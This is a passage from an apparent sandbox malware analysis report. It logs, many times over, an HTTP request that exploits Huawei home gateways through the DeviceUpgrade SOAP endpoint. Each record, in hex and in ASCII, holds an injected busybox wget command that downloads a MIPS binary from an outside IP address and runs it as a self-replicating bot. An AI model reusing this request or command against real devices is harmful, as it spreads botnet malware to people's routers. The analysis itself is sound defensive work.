selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l 